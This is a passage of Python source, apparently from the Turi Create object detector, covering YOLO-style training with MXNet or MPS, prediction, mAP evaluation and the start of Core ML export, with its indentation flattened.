raise _ToolkitError('Unknown advanced parameters: {}'.format(unsupported))
params.update(kwargs['_advanced_parameters'])
anchors = params['anchors']
num_anchors = len(anchors)
if batch_size < 1:
batch_size = 32 # Default if not user-specified
cuda_gpus = _mxnet_utils.get_gpus_in_use(max_devices=batch_size)
num_mxnet_gpus = len(cuda_gpus)
use_mps = _use_mps() and num_mxnet_gpus == 0
batch_size_each = batch_size // max(num_mxnet_gpus, 1)
if use_mps and _mps_device_memory_limit() < 4 * 1024 * 1024 * 1024:
# Reduce batch size for GPUs with less than 4GB RAM
batch_size_each = 16
# Note, this may slightly alter the batch size to fit evenly on the GPUs
batch_size = max(num_mxnet_gpus, 1) * batch_size_each
if verbose:
print("Setting 'batch_size' to {}".format(batch_size))
# The IO thread also handles MXNet-powered data augmentation. This seems
# to be problematic to run independently of a MXNet-powered neural network
# in a separate thread. For this reason, we restrict IO threads to when
# the neural network backend is MPS.
io_thread_buffer_size = params['io_thread_buffer_size'] if use_mps else 0
if verbose:
# Estimate memory usage (based on experiments)
cuda_mem_req = 550 + batch_size_each * 85
_tkutl._print_neural_compute_device(cuda_gpus=cuda_gpus, use_mps=use_mps,
cuda_mem_req=cuda_mem_req)
grid_shape = params['grid_shape']
input_image_shape = (3,
grid_shape[0] * ref_model.spatial_reduction,
grid_shape[1] * ref_model.spatial_reduction)
try:
if is_annotations_list:
instances = (dataset.stack(annotations, new_column_name='_bbox', drop_na=True)
.unpack('_bbox', limit=['label']))
else:
instances = dataset.rename({annotations: '_bbox'}).dropna('_bbox')
instances = instances.unpack('_bbox', limit=['label'])
except (TypeError, RuntimeError):
# If this fails, the annotation format isinvalid at the coarsest level
raise _ToolkitError("Annotations format is invalid. Must be a list of "
"dictionaries or single dictionary containing 'label' and 'coordinates'.")
num_images = len(dataset)
num_instances = len(instances)
if classes is None:
classes = instances['_bbox.label'].unique()
classes = sorted(classes)
# Make a class-to-index look-up table
class_to_index = {name: index for index, name in enumerate(classes)}
num_classes = len(classes)
if max_iterations == 0:
# Set number of iterations through a heuristic
num_iterations_raw = 5000 * _np.sqrt(num_instances) / batch_size
num_iterations = 1000 * max(1, int(round(num_iterations_raw / 1000)))
if verbose:
print("Setting 'max_iterations' to {}".format(num_iterations))
else:
num_iterations = max_iterations
# Create data loader
loader = _SFrameDetectionIter(dataset,
batch_size=batch_size,
input_shape=input_image_shape[1:],
output_shape=grid_shape,
anchors=anchors,
class_to_index=class_to_index,
aug_params=params,
shuffle=params['shuffle'],
loader_type='augmented',
feature_column=feature,
annotations_column=annotations,
io_thread_buffer_size=io_thread_buffer_size,
iterations=num_iterations)
# Predictions per anchor box: x/y + w/h + object confidence + class probs
preds_per_box = 5 + num_classes
output_size = preds_per_box * num_anchors
ymap_shape = (batch_size_each,) + tuple(grid_shape) + (num_anchors, preds_per_box)
net = _tiny_darknet(output_size=output_size)
loss = _YOLOLoss(input_shape=input_image_shape[1:],
output_shape=grid_shape,
batch_size=batch_size_each,
num_classes=num_classes,
anchors=anchors,
parameters=params)
base_lr = params['learning_rate']
steps = [num_iterations // 2, 3 * num_iterations // 4, num_iterations]
steps_and_factors = [(step, 10**(-i)) for i, step in enumerate(steps)]
steps, factors = zip(*steps_and_factors)
lr_scheduler = _ManualScheduler(step=steps, factor=factors)
ctx = _mxnet_utils.get_mxnet_context(max_devices=batch_size)
net_params = net.collect_params()
net_params.initialize(_mx.init.Xavier(), ctx=ctx)
net_params['conv7_weight'].initialize(_mx.init.Xavier(factor_type='avg'), ctx=ctx, force_reinit=True)
net_params['conv8_weight'].initialize(_mx.init.Uniform(0.00005), ctx=ctx, force_reinit=True)
# Initialize object confidence low, preventing an unnecessary adjustment
# period toward conservative estimates
bias = _np.zeros(output_size, dtype=_np.float32)
bias[4::preds_per_box] -= 6
from ._mx_detector import ConstantArray
net_params['conv8_bias'].initialize(ConstantArray(bias), ctx, force_reinit=True)
# Take a subset and then load the rest of the parameters. It is possible to
# do allow_missing=True directly on net_params. However, this will more
# easily hide bugs caused by names getting out of sync.
ref_model.available_parameters_subset(net_params).load(ref_model.model_path, ctx)
column_names = ['Iteration', 'Loss', 'Elapsed Time']
num_columns = len(column_names)
column_width = max(map(lambda x: len(x), column_names)) + 2
hr = '+' + '+'.join(['-' * column_width] * num_columns) + '+'
progress = {'smoothed_loss': None, 'last_time': 0}
iteration = 0
def update_progress(cur_loss, iteration):
iteration_base1 = iteration + 1
if progress['smoothed_loss'] is None:
progress['smoothed_loss'] = cur_loss
else:
progress['smoothed_loss'] = 0.9 * progress['smoothed_loss'] + 0.1 * cur_loss
cur_time = _time.time()
# Printing of table header is deferred, so that start-of-training
# warnings appear above the table
if verbose and iteration == 0:
# Print progress table header
print(hr)
print(('| {:<{width}}' * num_columns + '|').format(*column_names, width=column_width-1))
print(hr)
if verbose and (cur_time > progress['last_time'] + 10 or
iteration_base1 == max_iterations):
# Print progress table row
elapsed_time = cur_time - start_time
print("| {cur_iter:<{width}}| {loss:<{width}.3f}| {time:<{width}.1f}|".format(
cur_iter=iteration_base1, loss=progress['smoothed_loss'],
time=elapsed_time , width=column_width-1))
progress['last_time'] = cur_time
if use_mps:
# Force initialization of net_params
# TODO: Do not rely on MXNet to initialize MPS-based network
net.forward(_mx.nd.uniform(0, 1, (batch_size_each,) + input_image_shape))
mps_net_params = {}
keys = list(net_params)
for k in keys:
mps_net_params[k] = net_params[k].data().asnumpy()
# Multiplies the loss to move the fp16 gradients away from subnormals
# and gradual underflow. The learning rate is correspondingly divided
# by the same multiple to make training mathematically equivalent. The
# update is done in fp32, which is why this trick works. Does not
# affect how loss is presented to the user.
mps_loss_mult = params['mps_loss_mult']
mps_config = {
'mode': _MpsGraphMode.Train,
'use_sgd': True,
'learning_rate': base_lr / params['mps_loss_mult'],
'gradient_clipping': params.get('clip_gradients', 0.0) * mps_loss_mult,
'weight_decay': params['weight_decay'],
'od_include_network': True,
'od_include_loss': True,
'od_scale_xy': params['lmb_coord_xy'] * mps_loss_mult,
'od_scale_wh': params['lmb_coord_wh'] * mps_loss_mult,
'od_scale_no_object': params['lmb_noobj'] * mps_loss_mult,
'od_scale_object': params['lmb_obj'] * mps_loss_mult,
'od_scale_class': params['lmb_class'] * mps_loss_mult,
'od_max_iou_for_no_object': 0.3,
'od_min_iou_for_object': 0.7,
'od_rescore': params['rescore'],
}
mps_net = _get_mps_od_net(input_image_shape=input_image_shape,
batch_size=batch_size,
output_size=output_size,
anchors=anchors,
config=mps_config,
weights=mps_net_params)
# Use worker threads to isolate different points of synchronization
# and/or waiting for non-Python tasks to finish. The
# sframe_worker_thread will spend most of its time waiting for SFrame
# operations, largely image I/O and decoding, along with scheduling
# MXNet data augmentation. The numpy_worker_thread will spend most of
# its time waiting for MXNet data augmentation to complete, along with
# copying the results into NumPy arrays. Finally, the main thread will
# spend most of its time copying NumPy data into MPS and waiting for the
# results. Note that using three threads here only makes sense because
# each thread spends time waiting for non-Python code to finish (so that
# no thread hogs the global interpreter lock).
mxnet_batch_queue = _Queue(1)
numpy_batch_queue = _Queue(1)
def sframe_worker():
# Once a batch is loaded into NumPy, pass it immediately to the
# numpy_worker so that we can start I/O and decoding for the next
# batch.
for batch in loader:
mxnet_batch_queue.put(batch)
mxnet_batch_queue.put(None)
def numpy_worker():
while True:
batch = mxnet_batch_queue.get()
if batch is None:
break
for x, y in zip(batch.data, batch.label):
# Convert to NumPy arrays with required shapes. Note that
# asnumpy waits for any pending MXNet operations to finish.
input_data = _mxnet_to_mps(x.asnumpy())
label_data = y.asnumpy().reshape(y.shape[:-2] + (-1,))
# Convert to packed 32-bit arrays.
input_data = input_data.astype(_np.float32)
if not input_data.flags.c_contiguous:
input_data = input_data.copy()
label_data = label_data.astype(_np.float32)
if not label_data.flags.c_contiguous:
label_data = label_data.copy()
# Push this batch to the main thread.
numpy_batch_queue.put({'input' : input_data,
'label' : label_data,
'iteration' : batch.iteration})
# Tell the main thread there's no more data.
numpy_batch_queue.put(None)
sframe_worker_thread = _Thread(target=sframe_worker)
sframe_worker_thread.start()
numpy_worker_thread = _Thread(target=numpy_worker)
numpy_worker_thread.start()
batch_queue = []
def wait_for_batch():
pending_loss = batch_queue.pop(0)
batch_loss = pending_loss.asnumpy() # Waits for the batch to finish
return batch_loss.sum() / mps_loss_mult
while True:
batch = numpy_batch_queue.get()
if batch is None:
break
# Adjust learning rate according to our schedule.
if batch['iteration'] in steps:
ii = steps.index(batch['iteration']) + 1
new_lr = factors[ii] * base_lr
mps_net.set_learning_rate(new_lr / mps_loss_mult)
# Submit this match to MPS.
batch_queue.append(mps_net.train(batch['input'], batch['label']))
# If we have two batches in flight, wait for the first one.
if len(batch_queue) > 1:
cur_loss = wait_for_batch()
# If we just submitted the first batch of an iteration, update
# progress for the iteration completed by the last batch we just
# waited for.
if batch['iteration'] > iteration:
update_progress(cur_loss, iteration)
iteration = batch['iteration']
# Wait for any pending batches and finalize our progress updates.
while len(batch_queue) > 0:
cur_loss = wait_for_batch()
update_progress(cur_loss, iteration)
sframe_worker_thread.join()
numpy_worker_thread.join()
# Load back into mxnet
mps_net_params = mps_net.export()
keys = mps_net_params.keys()
for k in keys:
if k in net_params:
net_params[k].set_data(mps_net_params[k])
else: # Use MxNet
net.hybridize()
options = {'learning_rate': base_lr, 'lr_scheduler': lr_scheduler,
'momentum': params['sgd_momentum'], 'wd': params['weight_decay'], 'rescale_grad': 1.0}
clip_grad = params.get('clip_gradients')
if clip_grad:
options['clip_gradient'] = clip_grad
trainer = _mx.gluon.Trainer(net.collect_params(), 'sgd', options)
for batch in loader:
data = _mx.gluon.utils.split_and_load(batch.data[0], ctx_list=ctx, batch_axis=0)
label = _mx.gluon.utils.split_and_load(batch.label[0], ctx_list=ctx, batch_axis=0)
Ls = []
Zs = []
with _mx.autograd.record():
for x, y in zip(data, label):
z = net(x)
z0 = _mx.nd.transpose(z, [0, 2, 3, 1]).reshape(ymap_shape)
L = loss(z0, y)
Ls.append(L)
for L in Ls:
L.backward()
trainer.step(1)
cur_loss = _np.mean([L.asnumpy()[0] for L in Ls])
update_progress(cur_loss, batch.iteration)
iteration = batch.iteration
training_time = _time.time() - start_time
if verbose:
print(hr) # progress table footer
# Save the model
training_iterations = iteration + 1
state = {
'_model': net,
'_class_to_index': class_to_index,
'_training_time_as_string': _seconds_as_string(training_time),
'_grid_shape': grid_shape,
'anchors': anchors,
'model': model,
'classes': classes,
'batch_size': batch_size,
'input_image_shape': input_image_shape,
'feature': feature,
'non_maximum_suppression_threshold': params['non_maximum_suppression_threshold'],
'annotations': annotations,
'num_classes': num_classes,
'num_examples': num_images,
'num_bounding_boxes': num_instances,
'training_time': training_time,
'training_epochs': training_iterations * batch_size // num_images,
'training_iterations': training_iterations,
'max_iterations': max_iterations,
'training_loss': progress['smoothed_loss'],
}
return ObjectDetector(state)
class ObjectDetector(_CustomModel):
"""
An trained model that is ready to use for classification, exported to
Core ML, or for feature extraction.
This model should not be constructed directly.
"""
_PYTHON_OBJECT_DETECTOR_VERSION = 1
def __init__(self, state):
self.__proxy__ = _PythonProxy(state)
@classmethod
def _native_name(cls):
return "object_detector"
def _get_native_state(self):
from .._mxnet import _mxnet_utils
state = self.__proxy__.get_state()
mxnet_params = state['_model'].collect_params()
state['_model'] = _mxnet_utils.get_gluon_net_params_state(mxnet_params)
return state
def _get_version(self):
return self._PYTHON_OBJECT_DETECTOR_VERSION
@classmethod
def _load_version(cls, state, version):
_tkutl._model_version_check(version, cls._PYTHON_OBJECT_DETECTOR_VERSION)
from ._model import tiny_darknet as _tiny_darknet
from .._mxnet import _mxnet_utils
num_anchors = len(state['anchors'])
num_classes = state['num_classes']
output_size = (num_classes + 5) * num_anchors
net = _tiny_darknet(output_size=output_size)
ctx = _mxnet_utils.get_mxnet_context(max_devices=state['batch_size'])
net_params = net.collect_params()
_mxnet_utils.load_net_params_from_state(net_params, state['_model'], ctx=ctx)
state['_model'] = net
state['input_image_shape'] = tuple([int(i) for i in state['input_image_shape']])
state['_grid_shape'] = tuple([int(i) for i in state['_grid_shape']])
return ObjectDetector(state)
def __str__(self):
"""
Return a string description of the model to the ``print`` method.
Returns
-------
out : string
A description of the ObjectDetector.
"""
return self.__repr__()
def __repr__(self):
"""
Print a string description of the model when the model name is entered
in the terminal.
"""
width = 40
sections, section_titles = self._get_summary_struct()
out = _tkutl._toolkit_repr_print(self, sections, section_titles,
width=width)
return out
def _get_summary_struct(self):
"""
Returns a structured description of the model, including (where
relevant) the schema of the training data, description of the training
data, training statistics, and model hyperparameters.
Returns
-------
sections : list (of list of tuples)
A list of summary sections.
Each section is a list.
Each item in a section list is a tuple of the form:
('<label>','<field>')
section_titles: list
A list of section titles.
The order matches that of the 'sections' object.
"""
model_fields = [
('Model', 'model'),
('Number of classes', 'num_classes'),
('Non-maximum suppression threshold', 'non_maximum_suppression_threshold'),
('Input image shape', 'input_image_shape'),
]
training_fields = [
('Training time', '_training_time_as_string'),
('Training epochs', 'training_epochs'),
('Training iterations', 'training_iterations'),
('Number of examples (images)', 'num_examples'),
('Number of bounding boxes (instances)', 'num_bounding_boxes'),
('Final loss (specific to model)', 'training_loss'),
]
section_titles = ['Schema', 'Training summary']
return([model_fields, training_fields], section_titles)
def _predict_with_options(self, dataset, with_ground_truth,
postprocess=True, confidence_threshold=0.001,
iou_threshold=None,
verbose=True):
"""
Predict with options for what kind of SFrame should be returned.
If postprocess is False, a single numpy array with raw unprocessed
results will be returned.
"""
if iou_threshold is None: iou_threshold = self.non_maximum_suppression_threshold
_raise_error_if_not_detection_sframe(dataset, self.feature, self.annotations,
require_annotations=with_ground_truth)
from ._sframe_loader import SFrameDetectionIter as _SFrameDetectionIter
from ._detection import (yolo_map_to_bounding_boxes as _yolo_map_to_bounding_boxes,
non_maximum_suppression as _non_maximum_suppression,
bbox_to_ybox as _bbox_to_ybox)
from .._mxnet import _mxnet_utils
import mxnet as _mx
loader = _SFrameDetectionIter(dataset,
batch_size=self.batch_size,
input_shape=self.input_image_shape[1:],
output_shape=self._grid_shape,
anchors=self.anchors,
class_to_index=self._class_to_index,
loader_type='stretched',
load_labels=with_ground_truth,
shuffle=False,
epochs=1,
feature_column=self.feature,
annotations_column=self.annotations)
num_anchors = len(self.anchors)
preds_per_box = 5 + len(self.classes)
output_size = preds_per_box * num_anchors
# If prediction is done with ground truth, two sframes of the same
# structure are returned, the second one containing ground truth labels
num_returns = 2 if with_ground_truth else 1
sf_builders = [
_tc.SFrameBuilder([int, str, float, float, float, float, float],
column_names=['row_id', 'label', 'confidence',
'x', 'y', 'width', 'height'])
for _ in range(num_returns)
]
num_mxnet_gpus = _mxnet_utils.get_num_gpus_in_use(max_devices=self.batch_size)
use_mps = _use_mps() and num_mxnet_gpus == 0
if use_mps:
if not hasattr(self, '_mps_inference_net') or self._mps_inference_net is None:
mxnet_params = self._model.collect_params()
mps_net_params = { k : mxnet_params[k].data().asnumpy()
for k in mxnet_params }
mps_config = {
'mode': _MpsGraphMode.Inference,
'od_include_network': True,
'od_include_loss': False,
}
mps_net = _get_mps_od_net(input_image_shape=self.input_image_shape,
batch_size=self.batch_size,
output_size=output_size,
anchors=self.anchors,
config=mps_config,
weights=mps_net_params)
self._mps_inference_net = mps_net
dataset_size = len(dataset)
ctx = _mxnet_utils.get_mxnet_context()
done = False
last_time = 0
raw_results = []
for batch in loader:
if batch.pad is not None:
size = self.batch_size - batch.pad
b_data = _mx.nd.slice_axis(batch.data[0], axis=0, begin=0, end=size)
b_indices = _mx.nd.slice_axis(batch.label[1], axis=0, begin=0, end=size)
b_oshapes = _mx.nd.slice_axis(batch.label[2], axis=0, begin=0, end=size)
else:
b_data = batch.data[0]
b_indices = batch.label[1]
b_oshapes = batch.label[2]
size = self.batch_size
if b_data.shape[0] < len(ctx):
ctx0 = ctx[:b_data.shape[0]]
else:
ctx0 = ctx
split_data = _mx.gluon.utils.split_and_load(b_data, ctx_list=ctx0, even_split=False)
split_indices = _mx.gluon.utils.split_data(b_indices, num_slice=len(ctx0), even_split=False)
split_oshapes = _mx.gluon.utils.split_data(b_oshapes, num_slice=len(ctx0), even_split=False)
for data, indices, oshapes in zip(split_data, split_indices, split_oshapes):
if use_mps:
mps_data = _mxnet_to_mps(data.asnumpy())
n_samples = mps_data.shape[0]
if mps_data.shape[0] != self.batch_size:
mps_data_padded = _np.zeros((self.batch_size,) + mps_data.shape[1:],
dtype=mps_data.dtype)
mps_data_padded[:mps_data.shape[0]] = mps_data
mps_data = mps_data_padded
mps_float_array = self._mps_inference_net.predict(mps_data)
mps_z = mps_float_array.asnumpy()[:n_samples]
z = _mps_to_mxnet(mps_z)
else:
z = self._model(data).asnumpy()
if not postprocess:
raw_results.append(z)
continue
ypred = z.transpose(0, 2, 3, 1)
ypred = ypred.reshape(ypred.shape[:-1] + (num_anchors, -1))
zipped = zip(indices.asnumpy(), ypred, oshapes.asnumpy())
for index0, output0, oshape0 in zipped:
index0 = int(index0)
x_boxes, x_classes, x_scores = _yolo_map_to_bounding_boxes(
output0[_np.newaxis], anchors=self.anchors,
confidence_threshold=confidence_threshold,
nms_thresh=None)
x_boxes0 = _np.array(x_boxes).reshape(-1, 4)
# Normalize
x_boxes0[:, 0::2] /= self.input_image_shape[1]
x_boxes0[:, 1::2] /= self.input_image_shape[2]
# Re-shape to original input size
x_boxes0[:, 0::2] *= oshape0[0]
x_boxes0[:, 1::2] *= oshape0[1]
# Clip the boxes to the original sizes
x_boxes0[:, 0::2] = _np.clip(x_boxes0[:, 0::2], 0, oshape0[0])
x_boxes0[:, 1::2] = _np.clip(x_boxes0[:, 1::2], 0, oshape0[1])
# Non-maximum suppression (also limit to 100 detection per
# image, inspired by the evaluation in COCO)
x_boxes0, x_classes, x_scores = _non_maximum_suppression(
x_boxes0, x_classes, x_scores,
num_classes=self.num_classes, threshold=iou_threshold,
limit=100)
for bbox, cls, s in zip(x_boxes0, x_classes, x_scores):
cls = int(cls)
values = [index0, self.classes[cls], s] + list(_bbox_to_ybox(bbox))
sf_builders[0].append(values)
if index0 == len(dataset) - 1:
done = True
cur_time = _time.time()
# Do not print process if only a few samples are predicted
if verbose and (dataset_size >= 5 and cur_time > last_time + 10 or done):
print('Predicting {cur_n:{width}d}/{max_n:{width}d}'.format(
cur_n=index0 + 1, max_n=dataset_size, width=len(str(dataset_size))))
last_time = cur_time
if done:
break
# Ground truth
if with_ground_truth:
zipped = _itertools.islice(zip(batch.label[1].asnumpy(), batch.raw_bboxes, batch.raw_classes), size)
for index0, bbox0, cls0 in zipped:
index0 = int(index0)
for bbox, cls in zip(bbox0, cls0):
cls = int(cls)
if cls == -1:
break
values = [index0, self.classes[cls], 1.0] + list(bbox)
sf_builders[1].append(values)
if index0 == len(dataset) - 1:
break
if postprocess:
ret = tuple([sb.close() for sb in sf_builders])
if len(ret) == 1:
return ret[0]
else:
return ret
else:
return _np.concatenate(raw_results, axis=0)
def _raw_predict(self, dataset):
return self._predict_with_options(dataset, with_ground_truth=False,
postprocess=False)
def _canonize_input(self, dataset):
"""
Takes input and returns tuple of the input in canonical form (SFrame)
along with an unpack callback function that can be applied to
prediction results to "undo" the canonization.
"""
unpack = lambda x: x
if isinstance(dataset, _tc.SArray):
dataset = _tc.SFrame({self.feature: dataset})
elif isinstance(dataset, _tc.Image):
dataset = _tc.SFrame({self.feature: [dataset]})
unpack = lambda x: x[0]
return dataset, unpack
def predict(self, dataset, confidence_threshold=0.25, iou_threshold=None, verbose=True):
"""
Predict object instances in an SFrame of images.
Parameters
----------
dataset : SFrame | SArray | turicreate.Image
The images on which to perform object detection.
If dataset is an SFrame, it must have a column with the same name
as the feature column during training. Additional columns are
ignored.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
iou_threshold : float
Threshold value for non-maximum suppression. Non-maximum suppression
prevents multiple bounding boxes appearing over a single object.
This threshold, set between 0 and 1, controls how aggressive this
suppression is. A value of 1 means no maximum suppression will
occur, while a value of 0 will maximally suppress neighboring
boxes around a prediction.
verbose : bool
If True, prints prediction progress.
Returns
-------
out : SArray
An SArray with model predictions. Each element corresponds to
an image and contains a list of dictionaries. Each dictionary
describes an object instances that was found in the image. If
`dataset` is a single image, the return value will be a single
prediction.
See Also
--------
evaluate
Examples
--------
.. sourcecode:: python
# Make predictions
>>> pred = model.predict(data)
# Stack predictions, for a better overview
>>> turicreate.object_detector.util.stack_annotations(pred)
Data:
+--------+------------+-------+-------+-------+-------+--------+
| row_id | confidence | label | x | y | width | height |
+--------+------------+-------+-------+-------+-------+--------+
| 0 | 0.98 | dog | 123.0 | 128.0 | 80.0 | 182.0 |
| 0 | 0.67 | cat | 150.0 | 183.0 | 129.0 | 101.0 |
| 1 | 0.8 | dog | 50.0 | 432.0 | 65.0 | 98.0 |
+--------+------------+-------+-------+-------+-------+--------+
[3 rows x 7 columns]
# Visualize predictions by generating a new column of marked up images
>>> data['image_pred'] = turicreate.object_detector.util.draw_bounding_boxes(data['image'], data['predictions'])
"""
_numeric_param_check_range('confidence_threshold', confidence_threshold, 0.0, 1.0)
dataset, unpack = self._canonize_input(dataset)
stacked_pred = self._predict_with_options(dataset, with_ground_truth=False,
confidence_threshold=confidence_threshold,
iou_threshold=iou_threshold,
verbose=verbose)
from . import util
return unpack(util.unstack_annotations(stacked_pred, num_rows=len(dataset)))
def evaluate(self, dataset, metric='auto',
output_type='dict', iou_threshold=None,
confidence_threshold=None, verbose=True):
"""
Evaluate the model by making predictions and comparing these to ground
truth bounding box annotations.
Parameters
----------
dataset : SFrame
Dataset of new observations. Must include columns with the same
names as the annotations and feature used for model training.
Additional columns are ignored.
metric : str or list, optional
Name of the evaluation metric or list of several names. The primary
metric is average precision, which is the area under the
precision/recall curve and reported as a value between 0 and 1 (1
being perfect). Possible values are:
- 'auto' : Returns all primary metrics.
- 'all' : Returns all available metrics.
- 'average_precision_50' : Average precision per class with
intersection-over-union threshold at
50% (PASCAL VOC metric).
- 'average_precision' : Average precision per class calculated over multiple
intersection-over-union thresholds
(at 50%, 55%, ..., 95%) and averaged.
- 'mean_average_precision_50' : Mean over all classes (for ``'average_precision_50'``).
This is the primary single-value metric.
- 'mean_average_precision' : Mean over all classes (for ``'average_precision'``)
output_type : str
Type of output:
- 'dict' : You are given a dictionary where each key is a metric name and the
value is another dictionary containing class-to-metric entries.
- 'sframe' : All metrics are returned as a single `SFrame`, where each row is a
class and each column is a metric. Metrics that are averaged over
class cannot be returned and are ignored under this format.
However, these are easily computed from the `SFrame` (e.g.
``results['average_precision'].mean()``).
iou_threshold : float
Threshold value for non-maximum suppression. Non-maximum suppression
prevents multiple bounding boxes appearing over a single object.
This threshold, set between 0 and 1, controls how aggressive this
suppression is. A value of 1 means no maximum suppression will
occur, while a value of 0 will maximally suppress neighboring
boxes around a prediction.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
verbose : bool
If True, prints evaluation progress.
Returns
-------
out : dict / SFrame
Output type depends on the option `output_type`.
See Also
--------
create, predict
Examples
--------
>>> results = model.evaluate(data)
>>> print('mAP: {:.1%}'.format(results['mean_average_precision']))
mAP: 43.2%
"""
if iou_threshold is None: iou_threshold = self.non_maximum_suppression_threshold
if confidence_threshold is None: confidence_threshold = 0.001
AP = 'average_precision'
MAP = 'mean_average_precision'
AP50 = 'average_precision_50'
MAP50 = 'mean_average_precision_50'
ALL_METRICS = {AP, MAP, AP50, MAP50}
if isinstance(metric, (list, tuple, set)):
metrics = metric
elif metric == 'all':
metrics = ALL_METRICS
elif metric == 'auto':
metrics = {AP50, MAP50}
elif metric in ALL_METRICS:
metrics = {metric}
else:
raise _ToolkitError("Metric '{}' not supported".format(metric))
pred, gt = self._predict_with_options(dataset, with_ground_truth=True,
confidence_threshold=confidence_threshold,
iou_threshold=iou_threshold,
verbose=verbose)
pred_df = pred.to_dataframe()
gt_df = gt.to_dataframe()
thresholds = _np.arange(0.5, 1.0, 0.05)
all_th_aps = _average_precision(pred_df, gt_df,
class_to_index=self._class_to_index,
iou_thresholds=thresholds)
def class_dict(aps):
return {classname: aps[index]
for classname, index in self._class_to_index.items()}
if output_type == 'dict':
ret = {}
if AP50 in metrics:
ret[AP50] = class_dict(all_th_aps[0])
if AP in metrics:
ret[AP] = class_dict(all_th_aps.mean(0))
if MAP50 in metrics:
ret[MAP50] = all_th_aps[0].mean()
if MAP in metrics:
ret[MAP] = all_th_aps.mean()
elif output_type == 'sframe':
ret = _tc.SFrame({'label': self.classes})
if AP50 in metrics:
ret[AP50] = all_th_aps[0]
if AP in metrics:
ret[AP] = all_th_aps.mean(0)
else:
raise _ToolkitError("Output type '{}' not supported".format(output_type))
return ret
def _create_coreml_model(self, include_non_maximum_suppression,
iou_threshold, confidence_threshold):
import mxnet as _mx
from .._mxnet._mxnet_to_coreml import _mxnet_converter
import coremltools
from coremltools.models import datatypes, neural_network
if iou_threshold is None: iou_threshold = self.non_maximum_suppression_threshold
if confidence_threshold is None: confidence_threshold = 0.25
preds_per_box = 5 + self.num_classes
num_anchors = len(self.anchors)
num_classes = self.num_classes
batch_size = 1
image_shape = (batch_size,) + tuple(self.input_image_shape)
s_image_uint8 = _mx.sym.Variable(self.feature, shape=image_shape, dtype=_np.float32)
s_image = s_image_uint8 / 255
# Swap a maxpool+slice in mxnet to a coreml natively supported layer
from copy import copy
net = copy(self._model)
net._children = copy(self._model._children)
from ._model import _SpecialDarknetMaxpoolBlock
op = _SpecialDarknetMaxpoolBlock(name='pool5')
# Make sure we are removing the right layers
assert (self._model[23].name == 'pool5' and
self._model[24].name == 'specialcrop5')
del net._children[24]
net._children[23] = op
s_ymap = net(s_image)
mod = _mx.mod.Module(symbol=s_ymap, label_names=None, data_names=[self.feature])
mod.bind(for_training=False, data_shapes=[(self.feature, image_shape)])
# Copy over params from net
mod.init_params()
arg_params, aux_params = mod.get_params()
net_params = net.collect_params()
new_arg_params = {}
for k, param in arg_params.items():
new_arg_params[k] = net_params[k].data(net_params[k].list_ctx()[0])
new_aux_params = {}
for k, param in aux_params.items():
new_aux_params[k] = net_params[k].data(net_params[k].list_ctx()[0])
mod.set_params(new_arg_params, new_aux_params)
input_names = [self.feature]
input_dims = [list(self.input_image_shape)]
input_types = [datatypes.Array(*dim) for dim in input_dims]
input_features = list(zip(input_names, input_types))
num_spatial = self._grid_shape[0] * self._grid_shape[1]
num_bounding_boxes = num_anchors * num_spatial
CONFIDENCE_STR = ("raw_confidence" if include_non_maximum_suppression
else "confidence")
COORDINATES_STR = ("raw_coordinates" if include_non_maximum_suppression
else "coordinates")
output_names = [
CONFIDENCE_STR,
COORDINATES_STR
]
output_dims = [
(num_bounding_boxes, num_classes),
(num_bounding_boxes, 4),
]
output_types = [datatypes.Array(*dim) for dim in output_dims]
output_features = list(zip(output_names, output_types))
mode = None
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, mode)
_mxnet_converter.convert(mod, mode=None,
input_shape=[(self.feature, image_shape)],
builder=builder, verbose=False)
prefix = '__tc__internal__'
# (1, B, C+5, S*S)
builder.add_reshape(name=prefix + 'ymap_sp_pre',
target_shape=[batch_size, num_anchors, preds_per_box, num_spatial],
mode=0,
input_name='conv8_fwd_output',
output_name=prefix + 'ymap_sp_pre')
# (1, C+5, B, S*S)
builder.add_permute(name=prefix + 'ymap_sp',
dim=[0, 2, 1, 3],
input_name=prefix + 'ymap_sp_pre',
output_name=prefix + 'ymap_sp')
# POSITION: X/Y
# (1, 2, B, S*S)
builder.add_slice(name=prefix + 'raw_rel_xy_sp',
axis='channel',
start_index=0,
end_index=2,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'raw_rel_xy_sp')
# (1, 2, B, S*S)
builder.add_activation(name=prefix + 'rel_xy_sp',
non_linearity='SIGMOID',
input_name=prefix + 'raw_rel_xy_sp',
output_name=prefix + 'rel_xy_sp')
# (1, 2, B*H*W, 1)
builder.add_reshape(name=prefix + 'rel_xy',
target_shape=[batch_size, 2, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'rel_xy_sp',
output_name=prefix + 'rel_xy')
c_xy = _np.array(_np.meshgrid(_np.arange(self._grid_shape[1]),
_np.arange(self._grid_shape[0])), dtype=_np.float32)
c_xy_reshaped = (_np.tile(c_xy[:, _np.newaxis], (num_anchors, 1, 1))
.reshape(2, -1))[_np.newaxis, ..., _np.newaxis]
# (1, 2, B*H*W, 1)
builder.add_load_constant(prefix + 'constant_xy',
constant_value=c_xy_reshaped,
shape=c_xy_reshaped.shape[1:],
output_name=prefix + 'constant_xy')
# (1, 2, B*H*W, 1)
builder.add_elementwise(name=prefix + 'xy',
mode='ADD',
input_names=[prefix + 'constant_xy', prefix + 'rel_xy'],
output_name=prefix + 'xy')
# SHAPE: WIDTH/HEIGHT
# (1, 2, B, S*S)
builder.add_slice(name=prefix + 'raw_rel_wh_sp',
axis='channel',
start_index=2,
end_index=4,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'raw_rel_wh_sp')
# (1, 2, B, S*S)
builder.add_unary(name=prefix + 'rel_wh_sp',
mode='exp',
input_name=prefix + 'raw_rel_wh_sp',
output_name=prefix + 'rel_wh_sp')
# (1, 2*B, S, S)
builder.add_reshape(name=prefix + 'rel_wh',
target_shape=[batch_size, 2 * num_anchors] + list(self._grid_shape),
mode=0,
input_name=prefix + 'rel_wh_sp',
output_name=prefix + 'rel_wh')
np_anchors = _np.asarray(self.anchors, dtype=_np.float32).T
anchors_0 = _np.tile(np_anchors.reshape([2 * num_anchors, 1, 1]), self._grid_shape)
# (1, 2*B, S, S)
builder.add_load_constant(name=prefix + 'c_anchors',
constant_value=anchors_0,
shape=anchors_0.shape,
output_name=prefix + 'c_anchors')
# (1, 2*B, S, S)
